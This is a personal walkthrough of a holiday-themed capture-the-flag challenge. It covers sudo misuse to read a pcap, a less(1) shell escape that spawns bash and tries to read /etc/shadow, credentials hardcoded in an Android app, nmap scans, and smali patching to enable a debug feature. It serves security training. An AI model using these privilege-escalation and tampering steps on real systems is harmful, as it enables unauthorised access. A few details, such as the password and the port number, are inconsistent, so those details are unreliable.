User scratchy may run the following commands on 5c38c4bcd72f:
(itchy) NOPASSWD: /usr/sbin/tcpdump
(itchy) NOPASSWD: /usr/bin/strings
Decided to test that by opening the pcap file with tcpdump as itchy. Once I confirmed that works, I make sure to take a look at the actual pcap file. Turns out part of a POST rquest was sent using a form.
This has the value of santasli. Which just may be the beginning portion of the password.
sudo -u itchy tcpdump -qns 0 -A -r out.pcap
<head></head>
<body>
<form>
<input type="hidden" name="part1" value="santasli" />
</form>
</body>
</html>
Need to find the second part of the password. Based on the output from the sudo -l command. There is
another command that can be used as itchy. I attempted to use the strings(1) command as is. But,
I couldn’t see the appropriate output. Then I decdied to start playing with the character encoding to see
what I could find.
Looks like the output that I needed could be found by using the 16-bit little endian encoding for the text.
This outputs part two of this password: ttlehelper.
sudo -u itchy strings -e l out.pcap
part2:ttlehelper
The passcode to the door is santaslittlehelper. With that, I can finally open the door. Where there is a
little elf that hints you can use Burp Suite to send requests using Repeater and send it to the curl(1)
command.
6.2 The One Who Knocks: Doormat Challenge
This challenge was a fun one. It took a little trial and error. But, I got it. I used the find command in the
current directory to show the entire directory tree. The key_for_the_door.txt file was hidden within a
directory structure of objects that had no names, had spaces, and special characters.
elf@eb4145ccb6a0:~# find .
.
./.bashrc
./.doormat
./.doormat/-
./.doormat/- /
./.doormat/- / /\
./.doormat/- / /\/\\
./.doormat/- / /\/\\/Don't Look Here!
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/'
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook
./.doormat/- / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp
./.doormat/- / /\/\\/Don't Look Here!/secret
./.doormat/- / /\/\\/Don't Look Here!/files
./.doormat/- / /\/\\/holiday
./.doormat/- / /\/santa
./.doormat/- / /\/ls
./.doormat/- / /opt
./.doormat/- / /var
./.doormat/- /bin
./.doormat/- /not_here
./.doormat/share
./.doormat/temp
After utilizing a little patience, I was able to figure out which escapes needed to be used where. This led to the syntax provided below. Output from looking at the file provided the key for the door.
elf@0c213e1903f0:~$ cat .doormat/.\ /\ /\/\\/\\\\/Don\'t\ Look\ Here\!/You\ are\ persistent\,\ aren\'t\ you\?/\'/key_for_the_door.txt
key: open_sesame
The passcode to Santa’s office is open_sesame. With that, I could continue to the War Games challenge.
Unfortunately, I don’t have a whole lot of context to this either. I don’t have the ability to do the challenge in order to explain what’s actually happening here. Based on the report I made in 2016, I was able to enter Santa’s office from here.
6.3 Chess? War Games Challenge
This was an exact replica of the scene from War Games where you first talk to Joshua. I remember watching the movie in high school. But, I couldn’t remember off the top of my head how the scene went. Used YouTube to go through it again.
Funny enough, if you didn’t use good grammar the game would continue to say the following:
I DON'T UNDERSTAND.
Curious though if there’s a way to bypass Joshua and just acquire the passphrase. Based on the information provided in my old report, there ins’t anything indicating that you could.
Below is the output from talking to Joshua.
GREETINGS PROFESSOR FALKEN.
Hello.
HOW ARE YOU FEELING TODAY?
I'm fine. How are you?
EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?
People sometimes make mistakes.
YES THEY DO. SHALL WE PLAY A GAME?
Love to. How about Global Thermonuclear War?
WOULDN'T YOU PREFER A GOOD GAME OF CHESS?
Later. Let's play Global Thermonuclear War.
FINE
After finishing the first transision, I was given a choice between the United States and the Soviet Union. Initially, I chose the United States. But, with that choice I was unable to move to the next phase. So, I went through it again and followed the choices from the movie and chose the Soviet Union.
,------~~v,
|' п\ ,__/п||
/ \,/ /
| /
\ |
\ /
^п~_ /
'~~, ,п~п\ \
\/ \/
UNITED STATES
_--^\
_/ /,_
,, ,,/^ п vпv-__
|'~^п п\
_/ _ /^
/ ,~~^/|пп
| __,, v__\ \/
^~ / ~п //
\~, ,/ п
~~
SOVIET UNION
WHICH SIDE DO YOU WANT?
1. UNITED STATES
2. SOVIET UNION
PLEASE CHOOSE ONE:
2
At this stage of the movie, I needed to choose which city to attack. I chose Las Vagas just to follow the story line. Don’t send me hate mail, please.
AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME:
Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE:
LOOK AT THE PRETTY LIGHTS
Press Enter To Continue
After the launch was initiated, it gave the passcode to the door:
LOOK AT THE PRETTY LIGHTS
Sounds like this door leads to The Corridor. Looks like I have a note in here that states I think the passcode for the door will be revealed onces all of the audio files are put together.
6.4 Outatime: Traveled through time to 1978
As I read through this section of my report I can see the gears were turning. A lot of looking
through the man pages so I could provide a good explaination of what I was doing. I think I went
through most of the options and it didn’t provide much information. This is the part where I
decided to check the HELP command in the menu.
Train Management Console: AUTHORIZED USERS ONLY
==== MAIN MENU ====
STATUS: Train Status
BRAKEON: Set Brakes
BRAKEOFF: Release Brakes
START: Start Train
HELP: Open the help document
QUIT: Exit console
menu:main> HELP
Back in the day I didn’t provide a lot of context for myself. But, it
looks like the ouptut for the HELP command doesn’t provide a help
page. But, it does provide a hint. That hint is in unLESS. It also
provides a directory structure. The path /home/conductor/ provides
some useful data. Shows me where this file is located.
The hint indicates that the application used to manage the train is using
the less(1) command to read the TrainHelper.txt file. In the
report, I show some reading of the less(1) help page and find a
section for Miscellaneous Command.
When you’re using the less(1) command, you can utilize the !
or explaination point with the command issued after it to run shell
commands. Utilizing an application that can run arbitrary commands as
the user it’s being run as can prove problematic.
This could be considered a good example of utilizing the wrong tool for the job. Considering that anyone, with or without the intension of doing anything malicious can just run commands as the user configured to run whatever app this is.
**HELP** brings you to the this file. If it's not here, this console cannot do it, unLESS you know something I don't.
1/2 cup water
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
/home/conductor/TrainHelper.txt
In this case. It looks like I was testing the waters a little bit to see what I could do from here. Started out by listing the current directory structure. There are three files two of which look like they can be run by anyone. The other or “o” permissions are set for read and execute.
!ls -l
total 20
-rwxr-xr-x 1 root root 10528 Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root root 1506 Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root root 1588 Dec 10 19:36 Train_Console
!done (press RETURN)
I think at this point I was wondering which user this was running as. So
I guess I decided to attempt to look at the /etc/shadow file to
look at the password hashes? This could have been easily figured out if
I would have just used the whoami(1) command to see which user was
running the application. Permission was denied. Sad panda. But, life goes on.
cat: /etc/shadow: Permission denied
!done (press RETURN)
Again, instead of just checking to see which user I was running this in. I decided to just open an interative bash shell so I could do my thing without having to type an explaination point every time I needed to type a command.
I assume the Train_Console is being run as the conductor user.
Otherwise I would have been able to read the password hashes from the
previous section. Looks like in this section of the report I was curious
about what the ActivateTrain app would do. So, I ran it.
!bash
sh-4.3$ ls
ActivateTrain TrainHelper.txt Train_Console
sh-4.3$ ls -la
total 40
drwxr-xr-x 2 conductor conductor 4096 Dec 10 19:39 .
drwxr-xr-x 6 root root 4096 Dec 10 19:39 ..
-rw-r--r-- 1 conductor conductor 220 Nov 12 2014 .bash_logout
-rw-r--r-- 1 conductor conductor 3615 Nov 12 2014 .bashrc
-rw-r--r-- 1 conductor conductor 675 Nov 12 2014 .profile
-rwxr-xr-x 1 root root 10528 Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root root 1508 Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root root 1588 Dec 10 19:36 Train_Console
sh-4.3$ ./ActivateTrain
Below is the output from executing the ActivateTrain application
that is in the conductor users home directory.
I had to construct this from a picture by hand. It took some time. But, it was worth the effort. This provides the destination date and time. It also provides the last time the train departed. Maybe that was when Santa came up missing. Who knows. But, at this time I press enter so I can see what it does.
MONTH DAY YEAR HOUR MIN
+-----+ +----+ +------+ o AM +-----+ +----+ DISCONNECT CAPACITER DRIVE
| NOV | | 16 | | 1978 | | 10 |:| 21 | BEFORE OPENING
+-----+ +----+ +------+ X PM +-----+ +----+ +-------------------------+
DESTINATION TIME | |
+--------------------------------------------+ | +XX XX+ |
+--------------------------------------------+ | |XXX XXX| |
MONTH DAY YEAR HOUR MIN | +-+ XXX XXX +-+ |
+-----+ +----+ +------+ X AM +-----+ +---+ | XXX XXX |
| DEC | | 24 | | 2016 | | 01 |:| 02 | | XXXXX |
+-----+ +----+ +------+ o PM +-----+ +---+ | XXX |
PRESENT TIME | XXX |
+------------------------------------------+ | XXX |
+------------------------------------------+ | SHIELD EYES FROM LIGHT |
| XXX |
| XX+-+ |
MONTH DAY YEAR HOUR MIN | |
+-----+ +----+ +------+ o AM +----+ +----+ +-------------------------+
| NOV | | 16 | | 1978 | | 10 |:| 21 | +-----------+
+-----+ +----+ +------+ X PM +----+ +----+ | ACTIVATE! |
LAST TIME DEPARTED +-----------+
Press Enter to initiate time travel sequence.
Now for a little bit of explaination. There is an ASCII train animation here that I have in a picture. The train moves accross the screen and the below text is provided. I didn’t want to type it all out. But, I will provide a little train for anyone who wants a train. This is the ASCII art of Craig H. Smith that I took from TRAIN - ASCII ART .
o o o o o o oo oo oo oo}
o o oo ooo oo ooo ooo ooo ooo ooo oooooo}
oo oo oo oo ooo ooo ooo oooo ooooo}
o o o oo oo oo oooo oooooo}
o o o ooo oo ooooo}
o ooo}
_________ \|/ ++
___________ |_______|______/-\___|-|_^_/-\___||_n
n_____/ OOO \_ |[][] |----------------------|----|\
| (_) || |______________________|_|| ||P
| ZOO | -----/====+______|| _---====--||- /
q|===================|_|=_/o====+|=====[__]o====+|==[__]-p\
_______________(_)(_)______(_)(_)_____\__/_\__/_\__/__\__/_\__/_(_)____\
***** TIME TRAVEL TO 1978 SUCCESSFUL! *****
sh-4.3$
Once the train animation finishes it’s little appearance. My character is in 1978. As indicated by
TIME TRAVEL TO 1978 SUCCESSFUL!. I vividly remember that the colors of the game changed a little
when this happened, also. Don’t quote me on it. I remember really digging the Back to the Future reference!
6.5 Gone Spelunking
Looks like this is one of those text-based adventure games. A small copy of Hunt the Wumpus. Which was developed by Gregory Yob in 1973. You moved through the cave and in a hunt for a monster named the Wumpus. Yes kids. Back in the day they didn’t have graphical user interfaces. So, they had to use text to make their moves. This must be one of it’s variations. It’s before my time. I’ve palyed a few text based games. But, I’d never played Hunt the Wumpus. Ask your pops if he’s played it. It might start a good conversation. Or it won’t. Who knows.
Here is the Wikipedia page for Hunt the Wumpus .
I think I played this a few times and failed. Though, I will only show you the successful attempt.
Anyhoo. I just decided to play the game to see if I could beat it. I decided to shoot down tunnel three.
You are in room 16 of the cave, and have 5 arrows left.
*rustle* *rustle* (must be bats nearby)
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 3, 9, and 12.
Move or shoot? (m-s) s 3
Looks like I didn’t hit anything. Next move I decided to move to tunnel tree. Must be safe right? Let’s see.
You are in room 16 of the cave, and have 4 arrows left.
*rustle* *rustle* (must be bats nearby)
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 3, 9, and 12.
Move or shoot? (m-s) m 3
Then I decided to shoot down tunnel 10. Looks like that was the right choice because I killed the Wumpus. I had four arrows left and one of them would have had to hit the Wumpus eventually.
You are in room 3 of the cave, and have 4 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 2, 10, and 16.
Move or shoot? (m-s) s 10
*thwock!* *groan* *crash*
A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game! You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!
Passphrase:
WUMPUS IS MISUNDERSTOOD
Well, that was great! It’s interesting to see what playing games were like in the 70s. You had to use your imagination. The visual that you were hunting some monster in a cave had to be explained and the user needed to do the rest. Not sure where I’m going with this. I guess I’m glad that SANs is bringing this history back to us. A lot of people have forgotten or just don’t know. It’s wholesome and I enjoyed every second of it!
The passcode to the door is:
WUMPUS IS MISUNDERSTOOD
6.6 A Christmas Miracle: Found Santa
This is the part of the challenge where you go through the last door. Through the door you’ll see Santa. Santa can be found in the DFER in 1978. After completing the Pi challenges I guess I was looking around for him aimlessly for a little while. But, it sounds like I went back to that location in the game and found him.
You start a dialog with Santa and go through it all. He says something along the lines of “I bid you a VERY MERRY CHRISTMAS… AND A HAPPY NEW YEAR!”. Game then proceeds to go through a Star Wars inpired outro with the credits and all that.
Looks like I have a little note from the report.
“Now it’s tiem for the fun part. Getting the audio files!”
I also have another note here where I told Santa to not get too sauced on White Russians or something. All I can think of right now is, “I submitted this?? Really??” But, oh well.
Part 4: My Gosh… It’s Full of Holes
Jessica proclaimed, “We found Santa Claus! We’ve saved Christmas.” The children were exuberant!
Josh added, “And what a wonderful and diligent man Santa is, Jess. He thanked us so very kindly and then immediately returned to his holiday duties delivering presents.”
But, the children’s happiness was soon muted as they realized that Santa’s kidnapper was still on the loose. Jessica pointed out, “Too bad Santa was suffering short-term memory loss from getting hit over the head with our Christmas tree. Sadly, even he doesn’t know who his assailant was.”
Joshua came to the obvious conclusion, “You know, Jess, we should probably find the villain who tried to kidnap Santa and bring him to justice. If we don’t, Santa’s kidnapper could strike again! Neither Santa nor Christmas are really safe with this nefarious villain on the loose. How are we ever going to find this bad guy?”
Jessica responded, “I’ve noticed some really interesting issues in that SantaGram application that might help us get to the bottom of this whole caper. But, I’d need to exploit SantaGram and its associated servers to do so. Do you think we’re allowed to attack these systems?”
Josh, always impulsive, replied, “Well, Santa is running a bug bounty program, so he wants us to find these flaws. I think it’s ok to attack those targets!”
“Yeah, Josh, but how do we know for sure a given machine is included in the scope of the bug bounty program? We don’t want to hit something that is outside of Santa’s enterprise and cause yet another big Christmas disaster. It’s almost like we need an oracle to vet our target IP addresses, like we had last year when Mr. Tom Hessman confirmed which machines were in scope for our work.”
Josh lit up. “Hey, sis, in wandering around the North Pole, you’ll never believe who I ran into. Mr. Tom Hessman himself! As it turns out, he is up here, and is happy to confirm which IP addresses we are allowed to attack.”
“Well, let’s get to it then. Let’s participate in Santa’s bug bounty program!” Jessica announced.
And yet again, Dear Reader, you are called upon to help the Dosis children, this time by exploiting various servers associated with the SantaGram application. Analyze the clues you’ve been provided on Santa’s business card and the SantaGram APK file to identify target systems. Then, check with Tom Hessman at the North Pole to confirm that each IP address you find is included in the scope of your work. Each server has at least one flaw you can exploit to retrieve a small audio file on the system. If you get stuck, feel free to visit the elves of the North Pole for hints about various kinds of vulnerabilities and attacks you might find useful.
7. Santa’s Bug Bounty
ONCE YOU GET APPROVAL OF GIVEN IN-SCOPE TARGET IP ADDRESSES FROM TOM HESSMAN AT THE NORTH POLE, ATTEMPT TO REMOTELY EXPLOIT EACH OF THE FOLLOWING TARGETS:
I will provide the writeup of the exploited system in their listing.
The Mobile Analytics Server (via credentialed login access)
I found the Mobile Analytics Server domain name by looking at the b.java file in the APK file.
Also saw there were some credentials that could be used to login to the server. These credentials were
also used to provide the answer in Part
.
Analytics server doamin name is: analytics.northpolewonderland.com
The application sends reports to the Analytics server using POST requests. These are JSON queries sent to report the Android application usage, activity, etc. Looks like the application generates and sends a unique id of the device.
JSONObject.put("username", "guest");
JSONObject.put("password", "busyreindeer78");
JSONObject.put("type", "usage");
JSONObject.put("activity", str);
JSONObject.put("udid", Secure.getString(context.getContentResolver(), "android_id"));
new Thread(new Runnable() {
public void run() {
b.a("https://analytics.northpolewonderland.com/report.php?ty...", jsonObject);
}
...
Using Nmap, I looked at the domain name to find the public IP address of the Analytics server. I checked with the Oracle in the North Pole to confirm that the IP address was in the scope.
nmap -A -O analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 21:22 CST
Nmap scan report for analytics.northpolewonderland.com (104.198.252.157)
Host is up (0.099s latency).
rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORTS STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
| 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
| 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open ssl/http nginx 1.6.2
| http-git
| 104.198.252.157:443/.git/
| Git repository found!
| Repository description: Unabled repository; edit this file 'description' to name the...
|_ Last commit message: Finishing touches (style, css, etc)
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
|_ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after: 2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device Type: general purpose
Running (JUST GUESSING): Linux 2.6.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 2.6.18 - 2.6.22 (86%)
I used the following credentials to login to the following URL:
- URL: https://analytics.northposewonderland.com/login.php
- Username: guest
- Password: busyreindeer79
This logged me in as a guest user to the usage monitor. There is a link in the navbar named MP3.
This downloaded the discombobulatedaudio2.mp3 file.
The Dungeon Game
There wan’t a whole lot of information about the Dungeon game in the APK file. Only thing I could find
was in the strings.xml and public.xml files. Found this data using the grep(1) command.
Looks like the URL for the dungeon game is http://dungeon.northpolewonderland.com/.
grep -rnw . -e 'dungeon_url'
./res/values/strings.xml:34: <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string>
./res/values/public.xml:507: <public type="string" name="dungeon_url" id="0x7f07001f" />
Gathered a little more information for the dungeon game. Scanning it with nmap(1) provided the
data below. The port for the dungeon game is 111111/tcp. VCE is an acronym for Virtual Computing
Environment. The http port provided some help documentation on how to to play the game. So, it looks like
the VCE port is how I connected to it.
nmap dungeon.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.075s latency).
rDNS record for 35.184.47.138: 139.47.184.35.bc.googleusercontent.com
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
11111/tcp open vce
Nmap done: 1 IP address (1 host up) scanned in 5.94 seconds
Using netcat(1) I could access the Dungeon Game using the VCE port found from the nmap(1) scan.
netcat dungeon.northpolewodnerland.com 11111
Welcome to Dungeon. This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>
Decided to play for a bit to feel it out. Looked at some help options to see what I could do to cheat the game. There is a leaflet in the beginning of the game which provides what I needed to figure that out.
The leaflet explained that this version is compiled by Lance Taylor in C. It’s inspired by the adventure game Crowther and Woods and D&D Gygax and Arneson.
There are more commands here named HELP and INFO.
> read leaflet
Taken.
Welcome to Holiday Hack Challenge Dungeon!
Dungeon is a game of adventure, danger, and low cunning. In it
you will explore some of the most amazing territory ever seen by mortal
man. Hardened adventurers have run screaming from the terrors contained
within.
In Dungeon, the intrepid explorer delves into the forgotten secrets
of a lost labyrinth deep in the bowels of the earth, searching for
vast treasures long hidden from prying eyes, treasures guarded by
fearsome monsters and diabolical traps!
Your mission is to find the elf at the North Pole and barter with him
for information about holicay artifacts you need to complete your quest.
While the original mission objective of collecting twenty treassures to
place in the trophy case is still in play, it is not necessary to finish
your quest.
No DECsystem should be without one!
Dungeon was created at the Programming Technology Division of the MIT
Laboratory for Computer Science by Tim Anderson, Mark Blank, Bruce
Daniels, and Dave Lebling. It was inspired by the Adventure game of
Crowther and Woods, and the Dungeons and Dragons game of Gygax
and Arneson. The original version was written in MDL (alias MUDDLE).
The current version was translated from MDL to FORTRAN IV by
and was later translated to C.
One-line information may be obtained within the commands HELP and INFO.
I looked online and found online that this was also called Zork. The version from March 4, 1978 has a debugging feature; GDT. Although the release date looked off, I decided to fire it up. Looks like it’s available in this version of the game also.
I decided to check the help command. This provded a lot of information. But, all I needed really was the
Display text (DT) command. This will display text for the game. There could be some 2000 text entries for the
game.
>GDT
GDT>help
Valid commands are:
AA- Alter ADVS DR- Display Rooms
AC- Alter CEVENT DS- Display state
AF- Alter FINDEX DT- Display text
AH- Alter HERE DV- Display VILLS
AN- Alter switches DX- Display EXITS
AO- Alter OBJCTS DZ- Display PUZZLE
AR- Alter ROOMS D2- Display ROOM2
AV- Alter VILLS EX- Exit
AX- Alter EXITS HE- Type this message
AZ- Alter PUZZLE NC- No cyclops
DA- Display ADVS ND- No Deaths
DC- Display CEVENT NR- No robber
DF- Display FINDEX NT- No troll
DH- Display HACKS PD- Program detail
DL- Display lengths RC- Restore cyclops
DM- Display RTEXT RD- Restore deaths
DN- Display switches RR- Restore robber
DO- Display OBJCTS RT- Restore troll
DP- Display parser TK- Take
Checked the first text entry and it provided the welcoming message for the game. Also, decided to check the 500th entry. Looks like I’m not at the end just yet. His booty remains…
GDT>dt
Entry: 1
Welcome to Dungeon. This version created 11-MAR-78
GDT>dt
Entry: 500
His booty remains.
GDT>
Checked text entry 2000. This kicked me out of the game. So I connected to it again and checked entry 1500 after entering GDT again. That crashed the game also. I suppose at some point I looked this up and learned this would cause an internal server error if you enter a number that’s too high. I mean, maybe. That or the connection gets disconnected whenever you exit the game or the game closes.
GDT>dt
Entry 2000
root@test:~# netcat 35.184.47.139 11111
Welcome to Dungeon. This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>gdt
GDT>dt
Entry: 1500
root@test:~#
Reconnected to the game again and I entered a value of 1000. I didn’t get kicked out of the game. Then I made a jump to 1025 and it provided more data. Perhaps I’m reaching the end? It just provided some text with more character dialog. Decided to go a step back to 1024 an what do you know. I get an email address and dialog with the request to send an email to “peppermint@northpolewonderland.com ”.
GDT>dt
Entry: 1000
The thief bows formally, raises his stilletto, and with a wry grin
ends the battle and your life.
GDT>dt
Entry: 1025
"That wasn't quite what I had in mind", he says, tossing
the # into the fire, where it vanishes.
GDT>dt
Entry: 1024
The elf, satisfied with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.
Sent an email to peppermint@northpolewonderland.com
asking for the audio file. They sent the email below
with discombobulatedaudio3.mp3 attached to it. I downlaoded this into my collection of audio files.
You tracked me down, of that I have no doubt.
I won't be upset, to avoid the inevitable bout.
You have what you came for, attached to this note.
Now go and catch your villian, and we will alike do dote.
The Debug Server
Debug server time. Needed to find it first. Looked around a little and found it was in the strings.xml file
using grep. Looks like the domain name is dev.northpolewonderland.com.
[root@test SantaGram_4.2]# grep -rnw . -e "dev"
./res/values/strings.xml:32: <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
Checked for anything useful that Nmap could provide me. Only useful information that it provided was that the server has http open and that it only accepts json requests.
When you go to the site in a browser all it shows is an empty page.
nmap -A -O dev.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for dev.northpolewonderland.com (35.184.63.245)
Host is up (0.087s latency).
rDNS record for 35.184.63.245: 245.63.184.35.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 a4:98:4c:b7:ba:53:71:ce:5c:b0:01:d6:66:2e:d2:e4 (DSA)
| 2048 df:44:96:be:13:c7:13:8a:b4:4a:43:4d:5b:f4:d4:2f (RSA)
|_ 256 b7:a2:a2:cc:d9:84:b4:34:98:4b:74:bc:4d:20:cd:90 (ECDSA)
80/tcp open http nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Site doesn't have a title (application/json).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device Type: general purpose
Running (JUST GUESSING): Linux 3.X|2.6.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2.0 (90%), Linux 2.6.18 - 2.6.22 (86%)
Network Distance: 12 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So, this is a debugger server. Developers use that as a way of fixing errors in their software. If the app crashes it will send the data to the debugging server should the feature be enabled.
I loaded up the application in an emulator and proxied the requests through Burp Suite. Poked around in the application
and I dind’t see any requests being sent to dev.northpolewonderland.com. So, I assumed that the debugging
feature for the SantaGram application was turned off or something.
Decided to take the APK file and decompiled it to Smali using the apktool(1).
apktool d SantaGram_4.2.apk
I: Usage Apktool 2.2.1-dirty on SantaGram_4.2.apk
I: Loading resources table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying known files...
I: Copying original files...
Once it was finished decompiling, I checked for the debugging functionality by searching all of the files. Looked
like the only file that contained the data needed to figure this out was the EditProfile.smali file. This is
located in the ./smali/com/northpolewonderland/santagream/ directory.
grep -A 3 -rnw . -e "debug"
./smali/com/northpolewonderland/santagram/EditProfile.smali:199: const-string v3, "Remote debug logging is Enabled"
./smali/com/northpolewonderland/santagram/EditProfile.smali-200-
./smali/com/northpolewonderland/santagram/EditProfile.smali-201- invoke-static {v0, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
./smali/com/northpolewonderland/santagram/EditProfile.smali-202-
--
./smali/com/northpolewonderland/santagram/EditProfile.smali:285: const-string v1, "debug"
./smali/com/northpolewonderland/santagram/EditProfile.smali-286-
./smali/com/northpolewonderland/santagram/EditProfile.smali-287- new-instance v2, Ljava/lang/StringBuilder;
./smali/com/northpolewonderland/santagram/EditProfile.smali-288-
--
./smali/com/northpolewonderland/santagram/EditProfile.smali:504: const-string v3, "Remote debug logging is Disabled"
./smali/com/northpolewonderland/santagram/EditProfile.smali-505-
./smali/com/northpolewonderland/santagram/EditProfile.smali-506- invoke-static {v0, v3}, Landroid/util/Log;->i(Ljava/lang/String;Ljava/lang/String;)I
./smali/com/northpolewonderland/santagram/EditProfile.smali-507-
--
./smali/com/northpolewonderland/santagram/EditProfile.smali:523: const-string v3, "Error posting JSON debug data: "
./smali/com/northpolewonderland/santagram/EditProfile.smali-524-
./smali/com/northpolewonderland/santagram/EditProfile.smali-525- invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
./smali/com/northpolewonderland/santagram/EditProfile.smali-526-
Read through the Smali file and found a some code. Specifically, if-eqz v0 :cond_0. This will jump to the cond_0
function. This function actually does nothing right now. Which is also probably by design.
iget-object v1, p0, Lcom/northpolewonderland/santagram/EditProfile;->a:Landroid/app/ProgressDialog;
invoke-virtual {v1, v2}, Landroid/app/ProgressDialog;->setIndeterminate(Z)V
if-eqz v0, :cond_0
:try_start_0
new-instance v0, Lorg/json/JSONObject;
invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
new-instance v1, Ljava/text/SimpleDateFormat;
const-string v2, "yyyyMMddHHmmssZ"
Below is the function that the data above will jump to. Notice :cond_0.
invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
invoke-virtual {v0}, Ljava/lang/Thread;->start()V
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
:cond_0
:goto_1
const v0, 0x7f0d0087
invoke-virtual {p0, v0}, Lcom/northpolewonderland/santagram/EditProfile;->findViewById(I)Landroid/view/View;
move-result-object v0
check-cast v0, Landroid/widget/ImageView;
iget-object v1, p0, Lcom/northpolewonderland/santagram/EditProfile;->b:Lcom/parse/ParseUser;
sget-object v2, Lcom/northpolewonderland/santagram/Configs;->USER_AVATAR:Ljava/lang/String;
To make it do what wanted it to. I needed to edit the EditProfile.smali file. Needed to change some code to enable the debugging functionality in the application. Right now when I click on the Edit Profile button, I can edit my profile, description, name, etc.
When I change the code in the EditProfile.smali file from if-eqz v0, :cond_0 to if-eqz v0, :try_start_0
as shown in the code below. The debugging functionality will be enabled and it should make requests to the server
after the APK file has been rebuilt.
iget-object v1, p0, Lcom/northpolewonderland/santagram/EditProfile;->a:Landroid/app/ProgressDialog;
invoke-virtual {v1, v2}, Landroid/app/ProgressDialog;->setIndeterminate(Z)V
if-eqz v0, :try_start_0
:try_start_0
new-instance v0, Lorg/json/JSONObject;
invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
new-instance v1, Ljava/text/SimpleDateFormat;
const-string v2, "yyyyMMddHHmmssZ"
Rebuilt the SantaGram application so it could be run in the emulator
using apktool(1). This just puts everything back to the way it was.
I renamed the file so it wouldn’t overwrite the original. Just in case I
messed something up. There were no build errors. So, I assume there weren’t
any issues.
apktool b SantaGram_4.3
I: Using Apktool 2.2.1-dirty
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building apk file...
I: Copying unknown files/dir...
After the application was repackaged, it needed to be signed before it would run. I went through the tutorial provided
by one of the elves in the North Pole to create a key with keytool. I signed the application with jarsigner.
Once that was completed, I installed the application in the emulator.
I configured Burp Suite to accept traffic through the emulator I think I went into the Edit Profile portion of the
application. It sent a request to dev.northpolewonderland.com. Which is exactly what I wanted.
Looks like its sending stuff. Nothing totally useful here. So, I allowed it to send the request to the server.
